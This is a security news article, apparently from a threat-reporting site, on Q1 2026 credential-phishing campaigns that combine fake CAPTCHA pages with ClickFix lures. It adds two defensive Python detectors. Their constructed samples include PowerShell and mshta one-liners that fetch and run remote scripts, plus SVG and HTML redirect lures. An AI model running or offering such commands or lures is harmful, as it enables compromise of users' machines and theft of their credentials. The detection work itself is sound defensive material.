Attackers Abuse CAPTCHA, ClickFix for Cred Tactics Boost
Cybercriminals are escalating their tactics beyond rudimentary email phishing. During the first quarter of 2026, attackers notably leveraged fake CAPTCHA pages and ClickFix techniques to amplify credential-phishing campaigns. This approach has pushed credential theft operations to an alarming scale, as detailed in Microsoft's recent findings.
What makes this wave particularly troubling is how quickly the tactics are evolving. Threat actors actively rotated delivery formats from HTML files to SVG attachments, PDFs, and Word documents within just weeks of each other, experimenting to find whatever slipped past email filters most effectively.
By the end of the quarter, PDF attachments emerged as the most common carrier for CAPTCHA-gated phishing content, growing by a staggering 356% in March after months of steady decline. This rapid rotation of file types signals that attackers are running near real-time experiments against email security systems.
Microsoft analysts identified and tracked several of these campaigns in detail, noting how threat actors combined fake CAPTCHA challenges with ClickFix-style manipulation to bypass conventional security controls.
In ClickFix attacks, a fake CAPTCHA prompt tricks users into copying and running a malicious command on their own device, under the false impression they are completing a human verification step.
This removes the need for traditional malware downloads entirely, since the victim unknowingly executes the attacker’s code themselves.
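Because the victim launches the command themselves, the artefact worth hunting for is the process chain rather than a dropped file: a script host started from the Run dialog or Explorer address bar (parent explorer.exe), a remote URL on the command line, and a download-and-execute primitive. The following is an added detection example written for this article, not code from Microsoft's report; the event records are constructed for illustration and their field names (parent, image, cmdline) are an assumption about how a SIEM exports process-creation telemetry.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Assumption: each event is a dict with parent (parent image path), image
(child image path) and cmdline (full command line), the kind of record a
SIEM would export from Sysmon Event ID 1 or Defender DeviceProcessEvents.
"""
import re

# Interpreters and LOLBins that ClickFix lures tell the victim to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe"}

# The Run dialog (Win+R) and the Explorer address bar both run under
# explorer.exe, so a script host with that parent matches the pasted-command path.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Download-and-execute primitives commonly seen in pasted one-liners.
DOWNLOAD_EXEC = [
    r"\biwr\b", r"invoke-webrequest", r"\biex\b", r"invoke-expression",
    r"downloadstring", r"\bmshta\b\s+https?://", r"\bcurl\b.*\|",
    r"-encodedcommand", r"\s-e(c|nc)?\s",
]
URL_RE = re.compile(r"https?://", re.I)
# Lures often append a comment so the pasted text looks like a verification string.
LURE_COMMENT_RE = re.compile(r"(#|::|rem\s).*(robot|captcha|verif)", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(event):
    """Return the list of ClickFix indicators present in one process-creation event."""
    hits = []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return hits
    cmd = event["cmdline"]
    if basename(event["parent"]) in RUN_DIALOG_PARENTS:
        hits.append("script host spawned by explorer.exe (Run dialog / address bar)")
    if URL_RE.search(cmd):
        hits.append("remote URL in command line")
    for pat in DOWNLOAD_EXEC:
        if re.search(pat, cmd, re.I):
            hits.append(f"download/execute primitive: {pat}")
            break
    low = cmd.lower()
    if "-w hidden" in low or "windowstyle hidden" in low:
        hits.append("hidden window requested")
    if LURE_COMMENT_RE.search(cmd):
        hits.append("verification-themed trailing comment")
    return hits


def detect(events, min_hits=2):
    """Map event index -> indicators for every event with at least min_hits indicators."""
    flagged = {}
    for i, ev in enumerate(events):
        hits = clickfix_indicators(ev)
        if len(hits) >= min_hits:
            flagged[i] = hits
    return flagged


# Constructed sample events (not real telemetry); 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://198.51.100.7/verify.ps1 | iex" '
                '# I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.7/check.hta"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "C:\\Users\\a\\Downloads\\invoice.docx"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for idx, hits in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(hits))
```

The threshold of two indicators keeps an administrator opening cmd.exe from the Run dialog (one indicator) out of the alert queue while still catching the canonical "paste this into Win+R" chain; tune the parent set if the lure in your environment targets the Windows Terminal or a File Explorer address bar instead.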
The Tycoon2FA phishing-as-a-service (PhaaS) platform, tracked by Microsoft as Storm-1747, remained a central player in this space during Q1 2026, though its grip on the CAPTCHA-gated phishing landscape weakened over the quarter.
While Tycoon2FA hosted over three-quarters of all CAPTCHA-gated phishing sites at the end of 2025, that share dropped to just 41% by March 2026, showing that more threat actors and phishing kits are picking up the same technique.
How the Attack Chain Unfolds
One of the most striking examples from Q1 2026 was a large three-day campaign between February 23 and February 25, 2026, which delivered over 1.2 million phishing messages to users at more than 53,000 organizations across 23 countries.
Attackers sent emails carrying SVG file attachments with names crafted to match the email theme, such as fake invoice notices, payment alerts, 401K update reminders, and voice message notifications.
When a recipient opened the attached SVG file, it rendered in their browser, which silently fetched content from attacker-controlled domains and presented a fake “security check” CAPTCHA screen.
Once the user completed the fake check, they were redirected to a spoofed sign-in page designed to steal their account credentials.
A separate campaign on March 17, 2026, further highlighted the scale of these operations. Over 1.5 million malicious HTML messages were sent to more than 179,000 organizations in 43 countries, each carrying an HTML attachment that opened in the local browser and redirected the victim through a staging page before landing on a CAPTCHA-gated phishing site.

The final phishing pages were hosted across multiple PhaaS providers including Tycoon2FA, Kratos, and EvilTokens.
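Both the SVG and the HTML attachments described above work the same way: a file that looks like an image or a document is really a small web page whose script or refresh directive hands the victim off to the attacker's CAPTCHA page. A mail gateway can triage such attachments statically before any browser renders them. The scanner below is an added example written for this article, not code from Microsoft or from any of the named phishing kits; the two lure files and two benign files are constructed for the demonstration and use reserved example domains, and the "any indicator means quarantine" verdict is an assumption you would tune to your own false-positive tolerance.

```python
"""Static triage of SVG and HTML email attachments for redirect-to-phish behaviour.

Assumption: the attachment bytes have already been extracted from the message.
The sample files and the quarantine rule below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Script constructs used to redirect, decode or fetch a second stage.
EXEC_PATTERNS = [
    r"window\.location", r"location\.(href|replace|assign)", r"document\.write",
    r"\beval\(", r"\batob\(", r"\bfetch\(", r"XMLHttpRequest", r"\.innerHTML\s*=",
]
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)


def _local(name):
    """Strip an XML namespace prefix such as {http://www.w3.org/2000/svg}."""
    return name.rsplit("}", 1)[-1].lower()


def scan_script_text(text, hits):
    """Append indicators found in inline script or event-handler code."""
    for pat in EXEC_PATTERNS:
        if re.search(pat, text, re.I):
            hits.append(f"script uses {pat}")
    for url in URL_RE.findall(text):
        hits.append(f"remote URL in script: {url}")


def scan_svg(data):
    """Walk the SVG tree and flag script, foreignObject, event handlers and external loads."""
    hits = []
    for el in ET.fromstring(data).iter():
        tag = _local(el.tag)
        if tag == "script":
            hits.append("<script> element in SVG")
            scan_script_text(el.text or "", hits)
        if tag == "foreignobject":
            hits.append("<foreignObject> (embeds HTML) in SVG")
        for attr, val in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                hits.append(f"event handler {name} on <{tag}>")
                scan_script_text(val, hits)
            elif name in ("href", "src") and URL_RE.match(val):
                hits.append(f"external reference on <{tag}>: {val}")
    return hits


class _HtmlScanner(HTMLParser):
    """Collect script, meta-refresh, frame and event-handler indicators from HTML."""

    def __init__(self):
        super().__init__()
        self.hits, self._in_script = [], False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self.hits.append("<script> element")
            if URL_RE.match(attrs.get("src", "")):
                self.hits.append(f"remote script: {attrs['src']}")
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            self.hits.append(f"meta refresh redirect: {attrs.get('content', '')}")
        if tag in ("iframe", "frame") and "src" in attrs:
            self.hits.append(f"<{tag}> loads {attrs['src']}")
        for k, v in attrs.items():
            if k.startswith("on"):
                self.hits.append(f"event handler {k} on <{tag}>")
                scan_script_text(v, self.hits)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            scan_script_text(data, self.hits)


def scan_html(data):
    p = _HtmlScanner()
    p.feed(data.decode("utf-8", "replace"))
    p.close()
    return p.hits


def triage(filename, data):
    """Return (verdict, indicators); any script, handler, redirect or remote load quarantines."""
    hits = scan_svg(data) if filename.lower().endswith(".svg") else scan_html(data)
    return ("quarantine" if hits else "clean"), hits


# Constructed samples: lure.example is a reserved name, the base64 decodes to a URL.
SAMPLE_SVG_LURE = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <script><![CDATA[
    function init(){ window.location = atob("aHR0cDovL2x1cmUuZXhhbXBsZS9jaGVjaw=="); }
  ]]></script>
</svg>"""
SAMPLE_SVG_BENIGN = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/></svg>"""
SAMPLE_HTML_LURE = b"""<html><head>
<meta http-equiv="refresh" content="0;url=http://staging.lure.example/go"></head>
<body><script>setTimeout(function(){location.href="http://captcha.lure.example/check";},500);
</script></body></html>"""
SAMPLE_HTML_BENIGN = b"<html><body><p>Your receipt is attached.</p></body></html>"

if __name__ == "__main__":
    for name, blob in [("invoice.svg", SAMPLE_SVG_LURE), ("logo.svg", SAMPLE_SVG_BENIGN),
                       ("payment.html", SAMPLE_HTML_LURE), ("receipt.html", SAMPLE_HTML_BENIGN)]:
        verdict, hits = triage(name, blob)
        print(f"{name}: {verdict}" + ("".join("\n  - " + h for h in hits) if hits else ""))
```

Note what the scanner deliberately does not do: it never resolves the remote URL or executes the script, so an attachment whose real payload lives on the attacker's server is still flagged on structure alone, which is the point, since the page content those campaigns serve is rotated far faster than any URL reputation feed can follow.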
Microsoft recommends organizations act on several fronts to reduce exposure to these threats. Users should be trained through regular phishing simulations and awareness programs so they can recognize fake CAPTCHA challenges and suspicious email attachments before acting on them.
Organizations should enable Safe Links and Safe Attachments in Microsoft Defender for Office 365, activate Zero-hour auto purge (ZAP) to retroactively quarantine malicious messages, and turn on network protection in Microsoft Defender for Endpoint.
Passwordless authentication methods such as FIDO keys or Microsoft Authenticator should be deployed where possible, while conditional access policies should enforce phishing-resistant multifactor authentication for privileged accounts.
Lastly, enabling automatic attack disruption in Microsoft Defender XDR can help contain attacks while giving security teams more time to respond.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.


